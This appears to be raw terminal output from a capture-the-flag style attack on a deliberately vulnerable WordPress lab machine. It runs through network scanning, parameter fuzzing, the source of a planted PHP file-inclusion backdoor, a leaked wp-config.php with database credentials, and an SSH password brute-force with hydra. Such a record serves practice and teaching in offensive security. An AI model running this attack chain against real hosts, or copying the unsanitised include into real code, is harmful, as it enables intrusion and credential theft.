Starting Nmap 7.92( https://nmap.org ) at 2022-03-22 02:44 CST
Nmap scan report for192.168.0.1
Host is up (0.00045s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for192.168.0.100
Host is up (0.13s latency).
MAC Address: 7A:7D:03:A2:2C:73 (Unknown)
Nmap scan report for192.168.0.103
Host is up (0.13s latency).
MAC Address: D2:66:41:4A:73:EF (Unknown)
Nmap scan report for192.168.0.105
Host is up (0.13s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for192.168.0.106
Host is up (0.13s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for192.168.0.108
Host is up (0.00056s latency).
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Nmap scan report for192.168.0.109
Host is up (0.00079s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for192.168.0.101
Host is up.
Nmap done: 256 IP addresses (8 hosts up) scanned in2.92 seconds
$ sudo nmap -sV -sC -A 192.168.0.108
Starting Nmap 7.92( https://nmap.org ) at 2022-03-22 02:44 CST
Nmap scan report for192.168.0.108
Host is up (0.00045s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:
|3072 8d:53:65:83:52:52:c4:12:72:49:be:33:5d:d1:e7:1c (RSA)|256 06:61:0a:49:86:43:64:ca:b0:0c:0f:09:17:7b:33:ba (ECDSA)|_ 256 9b:8d:90:47:2a:c1:dc:11:28:7d:57:e0:8a:23:b4:69 (ED25519)80/tcp open http Apache httpd 2.4.41 ((Ubuntu))| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Hacked By Red – Your site has been Hacked! You\xE2\x80\x99ll neve...|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
10.45 ms 192.168.0.108
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1host up) scanned in9.31 seconds
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation formore information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.0.108/NetworkFileManagerPHP.php?FUZZ=ls
Total requests: 2588=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000026: 2001 L 0 W 1 Ch "key"
000000003: 5000 L 0 W 0 Ch "page"
000000028: 5000 L 0 W 0 Ch "start"
000000015: 5000 L 0 W 0 Ch "user"
000000022: 5000 L 0 W 0 Ch "mode"
000000023: 5000 L 0 W 0 Ch "order"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
Total time: 150.3562
Processed Requests: 79
Filtered Requests: 0
Requests/sec.: 0.525418
<?php$file=$_GET['key'];if(isset($file)){include("$file");}else{include("NetworkFileManagerPHP.php");}/* That password alone won't help you! Hashcat says rules are rules */?>
<?php/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/// ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define('DB_NAME','wordpress');/** MySQL database username */define('DB_USER','john');/** MySQL database password */define('DB_PASSWORD','R3v_m4lwh3r3_k1nG!!');/** MySQL hostname */define('DB_HOST','localhost');/** Database Charset to use in creating database tables. */define('DB_CHARSET','utf8');/** The Database Collate type. Don't change this if in doubt. */define('DB_COLLATE','');define('FS_METHOD','direct');define('WP_SITEURL','http://redrocks.win');define('WP_HOME','http://redrocks.win');/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/define('AUTH_KEY','2uuBvc8SO5{>UwQ<^5V5[UHBw%N}-BwWqw|><*HfBwJ( $&%,(Zbg/jwFkRHf~v|');define('SECURE_AUTH_KEY','ah}<I`52GL6C^@~x C9FpMq-)txgOmA<~{R5ktY/@.]dBF?keB3}+Y^u!a54 Xc(');define('LOGGED_IN_KEY','[a!K}D<7-vB3Y&x_<3e]Wd+J]!o+A:U@QUZ-RU1]tO@/N}b}R@+/$+u*pJ|Z(xu-');define('NONCE_KEY',' g4|@~:h,K29D}$FL-f/eujw(VT;8wa7xRWpVR: >},]!Ez.48E:ok 8Ip~5_o+a');define('AUTH_SALT','a;,O<~vbpL+|@W+!Rs1o,T$r9(LwaXI =I7ZW$.Z[+BQ=B6QG7nr+w_bQ6B]5q4c');define('SECURE_AUTH_SALT','GkU:% Lo} 9}w38i:%]=uq&J6Z&RR#v2vsB5a_ +.[us;6mE+|$x*+ D*Ke+:Nt:');define('LOGGED_IN_SALT','#`F9&pm_jY}N3y0&8Z]EeL)z,$39,yFc$Nq`jGOMT_aM*`<$9A:9<Kk^L}fX@+iZ');define('NONCE_SALT','hTlFE*6zlZMbqluz)hf:-:x-:l89fC4otci;38|i`7eU1;+k[!0[ZG.oCt2@-y3X');/**#@-*//**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/$table_prefix='wp_';/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/define('WP_DEBUG',false);/* Add any custom values between this line and the "stop editing" line. *//* That's all, stop editing! Happy publishing. *//** Absolute path to the WordPress directory. */if(!defined('ABSPATH')){define('ABSPATH',__DIR__.'/');}/** Sets up WordPress vars and included files. */require_onceABSPATH.'wp-settings.php';
ø((=
beignet-opencl-icd: no supported GPU found, this is probably the wrong opencl-icd package for this hardware
(If you have multiple ICDs installed and OpenCL works, you can ignore this message)
beignet-opencl-icd: no supported GPU found, this is probably the wrong opencl-icd package for this hardware
(If you have multiple ICDs installed and OpenCL works, you can ignore this message)
beignet-opencl-icd: no supported GPU found, this is probably the wrong opencl-icd package for this hardware
(If you have multiple ICDs installed and OpenCL works, you can ignore this message)
beignet-opencl-icd: no supported GPU found, this is probably the wrong opencl-icd package for this hardware
(If you have multiple ICDs installed and OpenCL works, you can ignore this message)
$ hydra -l john -P ~/test./passlist.txt 192.168.0.104 ssh
Hydra v9.3 (c)2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-22 19:25:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4[DATA] max 16 tasks per 1 server, overall 16 tasks, 77 login tries (l:1/p:77), ~5 tries per task
[DATA] attacking ssh://192.168.0.104:22/
[22][ssh] host: 192.168.0.104 login: john password: R3v_m4lwh3r3_k1nG!!61 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-22 19:26:10